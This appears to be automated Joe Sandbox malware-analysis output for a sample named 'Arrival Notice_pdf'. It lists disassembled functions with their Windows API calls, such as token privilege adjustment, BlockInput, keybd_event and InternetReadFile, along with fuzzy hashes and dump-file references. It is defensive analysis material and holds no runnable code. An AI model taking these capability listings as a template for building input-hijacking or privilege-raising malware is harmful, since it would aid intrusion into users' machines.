Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: b12dc64abff24a7f711137c0f9f6d681a05be8f15d7e39ef5b92bd6dea51c08f
Instruction ID: f09935871b7723e6974f2305467d64022fb56a9913bd476f42c61eef23c09007
Opcode Fuzzy Hash: b12dc64abff24a7f711137c0f9f6d681a05be8f15d7e39ef5b92bd6dea51c08f
Instruction Fuzzy Hash: 2511E731310511AFE7212F26EC48E6FBB9CEF56761B054429F84ED7281CF70D9238AA4

Function 0025E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0025E014,74DF0AE0,0025DEF1,002DDC38,?,?), ref: 0025E02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0025E03E

Strings

GetNativeSystemInfo, xrefs: 0025E038
kernel32.dll, xrefs: 0025E027

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 977e6b9b53da3d4c4d401ac9c7fae1f67f5908f4145ef87c2bc9ecfd6ff6371f
Instruction ID: 632b96f4ee23b5d4e0e0cff47c7a6d1bdcaecfd0dd5d329a21efa299d30e147c
Opcode Fuzzy Hash: 977e6b9b53da3d4c4d401ac9c7fae1f67f5908f4145ef87c2bc9ecfd6ff6371f
Instruction Fuzzy Hash: C0D05E318207139FCB254F60EC08A22B6D4AF02701F294439A885A2190D6F4D8988650

Function 0025B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 0025B34E: GetWindowLongW.USER32(?,000000EB), ref: 0025B35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 0025B22F

Part of subcall function 0025B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0025B5A5

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: 85f4b6b15fa3569fbf043c4e45250399808279127c633c98e262c6739560dcbf
Instruction ID: 1671dec6c23ba1fe47f8e45dea42464b4dc2928df19b5d8873a731b154660f88
Opcode Fuzzy Hash: 85f4b6b15fa3569fbf043c4e45250399808279127c633c98e262c6739560dcbf
Instruction Fuzzy Hash: 06A15870134106BADF3B6E294C99EFF296CEB42382F55411EFC02D2181DB759C399A7A

Function 00294EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,002943BF,00000000), ref: 00294FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00294FD2

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 3a1fb75617570f6ed14be2a360545bc5a2d97879915d011ec6401e4ca5d940b0
Instruction ID: f63f899ab1838160745f122d18bcfeb01253b1c4e59b2c31eea1253e5fb15ea2
Opcode Fuzzy Hash: 3a1fb75617570f6ed14be2a360545bc5a2d97879915d011ec6401e4ca5d940b0
Instruction Fuzzy Hash: 0841F87162460ABFEF21DF90DC85EBFB7BCEB40314F10006EF60566180DAB19E669B90

Function 002477B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00247921

Strings

\Q/, xrefs: 002C1028

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: _memmove
String ID: \Q/
API String ID: 4104443479-2459328394
Opcode ID: ea39509006ddb4006d46331e58b8dde44bc40756894a1e175f982e2389505fe2
Instruction ID: 604327d569f39dd1f54ae81288789a44aa18c82f3687c582f04906eeb1793582
Opcode Fuzzy Hash: ea39509006ddb4006d46331e58b8dde44bc40756894a1e175f982e2389505fe2
Instruction Fuzzy Hash: 44A24D7492421ACFCB28CF58C880BADB7B1FF48314F2581A9D869AB391D7709D91DF90

Function 0028E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0028E20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0028E267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0028E2B4

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 8b0265a403e2990f143fe3c273d7de907b3fb5fbb0c336b700c35af2b6e132fd
Instruction ID: df4259065504a6b4f1db40a7b99ec83a9a4c5beacadca28789cfd6d5cb0f8e85
Opcode Fuzzy Hash: 8b0265a403e2990f143fe3c273d7de907b3fb5fbb0c336b700c35af2b6e132fd
Instruction Fuzzy Hash: 09218C35A10118EFDB00EFA5D884EADFBB8FF49710F0480AAE945AB291CB319915CF50

Function 0027B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0025F4EA: std::exception::exception.LIBCMT ref: 0025F51E
Part of subcall function 0025F4EA: __CxxThrowException@8.LIBCMT ref: 0025F533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0027B180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0027B1AD
GetLastError.KERNEL32 ref: 0027B1BA

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 3a2ae1ca0a038f0c34136b1f499a46f3cda0e57fb55bd175153642ceb46199ec
Instruction ID: 532d24a3b4819dd3ce2990725ec815cc0a47829aa311f66e2e0301e7628e5589
Opcode Fuzzy Hash: 3a2ae1ca0a038f0c34136b1f499a46f3cda0e57fb55bd175153642ceb46199ec
Instruction Fuzzy Hash: A211C1B1424205AFE7189F54ECC9D2BB7BCFB44310B20852EE45A93240EB70FC518A64

Function 00286606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00286623
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00286664
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0028666F

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 7a03c11bb5b0337c05d7955fef25c430742587d0fe1eb37982e0c9a7373c0ae7
Instruction ID: f5ff8de6b1597f109c69fb4acc64c84b8769ace70bce3670ac368840e9f82c28
Opcode Fuzzy Hash: 7a03c11bb5b0337c05d7955fef25c430742587d0fe1eb37982e0c9a7373c0ae7
Instruction Fuzzy Hash: 7B115E75E11228BFDB109FA5EC44FAEBBBCEB45B10F104166F910E7290D3B05A018BA1

Function 002871FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00287223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0028723A
FreeSid.ADVAPI32(?), ref: 0028724A

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: b383e7efd692bb447cdee4b86297324153c9e6a1bee7d233617b4f14c8b357c4
Instruction ID: 1cd0680cccfe6a7272bab2157a7ec26c9251091a7ff47f34aca081f9c0fa6420
Opcode Fuzzy Hash: b383e7efd692bb447cdee4b86297324153c9e6a1bee7d233617b4f14c8b357c4
Instruction Fuzzy Hash: E5F01279914219BFDF04DFE8DD99EEDBBB8FF08301F104469A502E2191E27096458B10

Function 0028F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0028F599
FindClose.KERNEL32(00000000), ref: 0028F5C9

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 87c9d831f0b0948bc2e3aa043e5a258f0dee7330bb1a7e5ce838f12f9d65f055
Instruction ID: 5cd7a51f2c48d843b68a863208e26f817191478d67ed879d3d5db4300925e0d3
Opcode Fuzzy Hash: 87c9d831f0b0948bc2e3aa043e5a258f0dee7330bb1a7e5ce838f12f9d65f055
Instruction Fuzzy Hash: AA118E316102009FD710EF28D849A2EB7E8FF85725F04892EF8AA97291DB74A9148B85

Function 0028CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0029BE6A,?,?,00000000,?), ref: 0028CEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0029BE6A,?,?,00000000,?), ref: 0028CEB9

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 06f1a5f1a5f67ca7e43dba5bd18b8f9b43449fdc7813a1888d0a18100598fbc7
Instruction ID: 6366707c72ee640f4de0023ecc3a84ac620ee1e42481a3903977ee0e8307846b
Opcode Fuzzy Hash: 06f1a5f1a5f67ca7e43dba5bd18b8f9b43449fdc7813a1888d0a18100598fbc7
Instruction Fuzzy Hash: D2F08235111229ABDB10AFA4EC49FEA776DBF08351F004165F915E6181D7709A50CFA1

Function 0028411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00284153
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00284166

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 8e4f5f9e2055bd194052a8b2a6912a18635c4482191cebe582c4be54155c822b
Instruction ID: a0c51af301fd9b39921ba5d3145fdcb8d3bf9b75d8f626382e124c2c930fad45
Opcode Fuzzy Hash: 8e4f5f9e2055bd194052a8b2a6912a18635c4482191cebe582c4be54155c822b
Instruction Fuzzy Hash: 20F06D7491024EAFDB059FA0C809BBE7BB0EF00305F008019F96596192D77986129FA0

Function 0027AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0027ACC0), ref: 0027AB99
CloseHandle.KERNEL32(?,?,0027ACC0), ref: 0027ABAB

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 26e7d1d1bd31f298d5fad509821183e663786d3c3145765f156fdb162b675f04
Instruction ID: 50cc8e19b8c620a194a0405b84e945b2f99ff85f5def1408b5bf1d175634a248
Opcode Fuzzy Hash: 26e7d1d1bd31f298d5fad509821183e663786d3c3145765f156fdb162b675f04
Instruction Fuzzy Hash: F3E08C32010610AFE7212F24FC08D77BBE9EF00321B208839F89A81430DB32ACA0DF50

Function 002681AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00266DB3,-0000031A,?,?,00000001), ref: 002681B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 002681BA

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 32018adf5207d9289e98c29c12f858a241fbb5ade798a08acec1234e9604d6bc
Instruction ID: 28b965c1afcc2e81ee0ae0f0f1f69ba0183488567c65a4d5e444b58c1f6a31a1
Opcode Fuzzy Hash: 32018adf5207d9289e98c29c12f858a241fbb5ade798a08acec1234e9604d6bc
Instruction Fuzzy Hash: 85B09231084648ABDB002BA1FC0DF587F68EB48652F0140A1F60D460618B7254108E92

Function 0026D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cc73d4158d3a3ad751ba49e2ca822c996eaecc24f73ec637905ca7150e9576d
Instruction ID: 66c25728a7717f51662cde3109918fb09bf2f432ffa5400e06207693df1b598d
Opcode Fuzzy Hash: 5cc73d4158d3a3ad751ba49e2ca822c996eaecc24f73ec637905ca7150e9576d
Instruction Fuzzy Hash: 7F321421E3AF458DD7239635D826335A38DAFB73D4F15D727E819B59A6DB28C8C34100

Function 002496C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: ebf1a2ab8b16e865765df166a9dd5e19e0134358566712a8302d97ce67f93988
Instruction ID: cf5dc71c389ccd3dc1ea9580d12b6c2fcb554c09c67af3485dc40cd7ffc3f71d
Opcode Fuzzy Hash: ebf1a2ab8b16e865765df166a9dd5e19e0134358566712a8302d97ce67f93988
Instruction Fuzzy Hash: 1322AC716283019FD728DF14C881BAFB7E4AF84754F10491DF89A9B291DB71E9A4CF82

Function 0027038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4f3bec086eb1e9d53bfdb95bee8b840c3786f0654e92fea23406b698aaf2c24
Instruction ID: 0a62acea7bbdd69333c594e136d5c0b295823d7ad6b7587eb6e5544d182718da
Opcode Fuzzy Hash: c4f3bec086eb1e9d53bfdb95bee8b840c3786f0654e92fea23406b698aaf2c24
Instruction Fuzzy Hash: E5B10120D2AF514DD32396399875336B75CAFBB2D6F91D71BFC2A74D22EB2189834180

Function 0028B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0028B6DF

Part of subcall function 0026344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0028BDC3,00000000,?,?,?,?,0028BF70,00000000,?), ref: 00263453
Part of subcall function 0026344A: __aulldiv.LIBCMT ref: 00263473

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 5cef5f69c98eba8af537cf2d6304f1f19587a7935aeb0fd8143a969ed5954a0a
Instruction ID: 7f6a723277fed2a5d093751a74823887e6399ee7a0573b2674b559829967b2f2
Opcode Fuzzy Hash: 5cef5f69c98eba8af537cf2d6304f1f19587a7935aeb0fd8143a969ed5954a0a
Instruction Fuzzy Hash: EC21A27A6355108BC72ACF28C491A92F7E5EB95320B248E7DE0E5CB2C0CB74B915CB54

Function 00296AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00296ACA

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 6becdac549e6ea1c780c117eb296873d0567fa3c9e9ce4cca5cda3b5c0816ce0
Instruction ID: 16334c2882e555080f2895152960f272413663f58d888d676296151418f10f6b
Opcode Fuzzy Hash: 6becdac549e6ea1c780c117eb296873d0567fa3c9e9ce4cca5cda3b5c0816ce0
Instruction Fuzzy Hash: BAE04835220204AFC700EF59D408D56B7EDAFB4751F04C827F945D7291DAB4F8148B90

Function 002874BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002874DE

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
